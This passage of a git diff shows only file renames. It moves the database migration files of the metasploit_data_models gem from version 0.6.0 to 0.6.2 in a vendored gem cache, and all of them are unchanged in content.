a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/018_add_workspace_user_info.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/018_add_workspace_user_info.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/018_add_workspace_user_info.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/018_add_workspace_user_info.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/019_add_workspace_desc.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/019_add_workspace_desc.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/019_add_workspace_desc.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/019_add_workspace_desc.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/020_add_user_preferences.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/020_add_user_preferences.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/020_add_user_preferences.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/020_add_user_preferences.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/021_standardize_info_and_data.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/021_standardize_info_and_data.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/021_standardize_info_and_data.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/021_standardize_info_and_data.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/022_enlarge_event_info.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/022_enlarge_event_info.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/022_enlarge_event_info.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/022_enlarge_event_info.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/023_add_report_downloaded_at.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/023_add_report_downloaded_at.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/023_add_report_downloaded_at.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/023_add_report_downloaded_at.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/024_convert_service_info_to_text.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/024_convert_service_info_to_text.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/024_convert_service_info_to_text.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/024_convert_service_info_to_text.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/025_add_user_admin.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/025_add_user_admin.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/025_add_user_admin.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/025_add_user_admin.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/026_add_creds_table.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/026_add_creds_table.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/026_add_creds_table.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/026_add_creds_table.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20100819123300_migrate_cred_data.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20100819123300_migrate_cred_data.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20100819123300_migrate_cred_data.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20100819123300_migrate_cred_data.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20100824151500_add_exploited_table.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20100824151500_add_exploited_table.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20100824151500_add_exploited_table.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20100824151500_add_exploited_table.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20100908001428_add_owner_to_workspaces.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20100908001428_add_owner_to_workspaces.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20100908001428_add_owner_to_workspaces.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20100908001428_add_owner_to_workspaces.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20100911122000_add_report_templates.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20100911122000_add_report_templates.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20100911122000_add_report_templates.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20100911122000_add_report_templates.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20100916151530_require_admin_flag.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20100916151530_require_admin_flag.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20100916151530_require_admin_flag.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20100916151530_require_admin_flag.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20100916175000_add_campaigns_and_templates.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20100916175000_add_campaigns_and_templates.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20100916175000_add_campaigns_and_templates.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20100916175000_add_campaigns_and_templates.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20100920012100_add_generate_exe_column.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20100920012100_add_generate_exe_column.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20100920012100_add_generate_exe_column.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20100920012100_add_generate_exe_column.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20100926214000_add_template_prefs.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20100926214000_add_template_prefs.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20100926214000_add_template_prefs.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20100926214000_add_template_prefs.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20101001000000_add_web_tables.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20101001000000_add_web_tables.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20101001000000_add_web_tables.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20101001000000_add_web_tables.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20101002000000_add_query.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20101002000000_add_query.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20101002000000_add_query.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20101002000000_add_query.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20101007000000_add_vuln_info.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20101007000000_add_vuln_info.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20101007000000_add_vuln_info.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20101007000000_add_vuln_info.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20101008111800_add_clients_to_campaigns.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20101008111800_add_clients_to_campaigns.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20101008111800_add_clients_to_campaigns.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20101008111800_add_clients_to_campaigns.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20101009023300_add_campaign_attachments.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20101009023300_add_campaign_attachments.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20101009023300_add_campaign_attachments.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20101009023300_add_campaign_attachments.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20101104135100_add_imported_creds.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20101104135100_add_imported_creds.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20101104135100_add_imported_creds.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20101104135100_add_imported_creds.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20101203000000_fix_web_tables.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20101203000000_fix_web_tables.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20101203000000_fix_web_tables.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20101203000000_fix_web_tables.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20101203000001_expand_host_comment.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20101203000001_expand_host_comment.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20101203000001_expand_host_comment.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20101203000001_expand_host_comment.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20101206212033_add_limit_to_network_to_workspaces.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20101206212033_add_limit_to_network_to_workspaces.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20101206212033_add_limit_to_network_to_workspaces.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20101206212033_add_limit_to_network_to_workspaces.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110112154300_add_module_uuid_to_tasks.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20110112154300_add_module_uuid_to_tasks.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110112154300_add_module_uuid_to_tasks.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20110112154300_add_module_uuid_to_tasks.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110204112800_add_host_tags.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20110204112800_add_host_tags.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110204112800_add_host_tags.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20110204112800_add_host_tags.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110317144932_add_session_table.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20110317144932_add_session_table.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110317144932_add_session_table.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20110317144932_add_session_table.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110414180600_add_local_id_to_session_table.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20110414180600_add_local_id_to_session_table.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110414180600_add_local_id_to_session_table.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20110414180600_add_local_id_to_session_table.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110415175705_add_routes_table.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20110415175705_add_routes_table.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110415175705_add_routes_table.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20110415175705_add_routes_table.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110422000000_convert_binary.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20110422000000_convert_binary.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110422000000_convert_binary.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20110422000000_convert_binary.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110425095900_add_last_seen_to_sessions.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20110425095900_add_last_seen_to_sessions.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110425095900_add_last_seen_to_sessions.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20110425095900_add_last_seen_to_sessions.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110513143900_track_successful_exploits.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20110513143900_track_successful_exploits.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110513143900_track_successful_exploits.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20110513143900_track_successful_exploits.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110517160800_rename_and_prune_nessus_vulns.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20110517160800_rename_and_prune_nessus_vulns.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110517160800_rename_and_prune_nessus_vulns.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20110517160800_rename_and_prune_nessus_vulns.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110527000000_add_task_id_to_reports_table.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20110527000000_add_task_id_to_reports_table.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110527000000_add_task_id_to_reports_table.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20110527000000_add_task_id_to_reports_table.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110527000001_add_api_keys_table.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20110527000001_add_api_keys_table.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110527000001_add_api_keys_table.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20110527000001_add_api_keys_table.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110606000001_add_macros_table.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20110606000001_add_macros_table.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110606000001_add_macros_table.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20110606000001_add_macros_table.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110622000000_add_settings_to_tasks_table.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20110622000000_add_settings_to_tasks_table.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110622000000_add_settings_to_tasks_table.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20110622000000_add_settings_to_tasks_table.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110624000001_add_listeners_table.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20110624000001_add_listeners_table.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110624000001_add_listeners_table.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20110624000001_add_listeners_table.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110625000001_add_macro_to_listeners_table.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20110625000001_add_macro_to_listeners_table.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110625000001_add_macro_to_listeners_table.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20110625000001_add_macro_to_listeners_table.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110630000001_add_nexpose_consoles_table.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20110630000001_add_nexpose_consoles_table.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110630000001_add_nexpose_consoles_table.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20110630000001_add_nexpose_consoles_table.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110630000002_add_name_to_nexpose_consoles_table.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20110630000002_add_name_to_nexpose_consoles_table.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110630000002_add_name_to_nexpose_consoles_table.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20110630000002_add_name_to_nexpose_consoles_table.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110717000001_add_profiles_table.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20110717000001_add_profiles_table.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110717000001_add_profiles_table.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20110717000001_add_profiles_table.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110727163801_expand_cred_ptype_column.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20110727163801_expand_cred_ptype_column.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110727163801_expand_cred_ptype_column.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20110727163801_expand_cred_ptype_column.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110730000001_add_initial_indexes.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20110730000001_add_initial_indexes.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110730000001_add_initial_indexes.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20110730000001_add_initial_indexes.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110812000001_prune_indexes.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20110812000001_prune_indexes.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110812000001_prune_indexes.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20110812000001_prune_indexes.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110922000000_expand_notes.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20110922000000_expand_notes.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110922000000_expand_notes.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20110922000000_expand_notes.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110928101300_add_mod_ref_table.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20110928101300_add_mod_ref_table.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110928101300_add_mod_ref_table.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20110928101300_add_mod_ref_table.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20111011110000_add_display_name_to_reports_table.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20111011110000_add_display_name_to_reports_table.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20111011110000_add_display_name_to_reports_table.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20111011110000_add_display_name_to_reports_table.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20111203000000_inet_columns.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20111203000000_inet_columns.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20111203000000_inet_columns.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20111203000000_inet_columns.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20111204000000_more_inet_columns.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20111204000000_more_inet_columns.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20111204000000_more_inet_columns.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20111204000000_more_inet_columns.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20111210000000_add_scope_to_hosts.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20111210000000_add_scope_to_hosts.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20111210000000_add_scope_to_hosts.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20111210000000_add_scope_to_hosts.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20120126110000_add_virtual_host_to_hosts.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20120126110000_add_virtual_host_to_hosts.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20120126110000_add_virtual_host_to_hosts.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20120126110000_add_virtual_host_to_hosts.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20120411173220_rename_workspace_members.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20120411173220_rename_workspace_members.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20120411173220_rename_workspace_members.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20120411173220_rename_workspace_members.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20120601152442_add_counter_caches_to_hosts.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20120601152442_add_counter_caches_to_hosts.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20120601152442_add_counter_caches_to_hosts.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20120601152442_add_counter_caches_to_hosts.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20120625000000_add_vuln_details.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20120625000000_add_vuln_details.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20120625000000_add_vuln_details.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20120625000000_add_vuln_details.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20120625000001_add_host_details.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20120625000001_add_host_details.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20120625000001_add_host_details.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20120625000001_add_host_details.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20120625000002_expand_details.rb 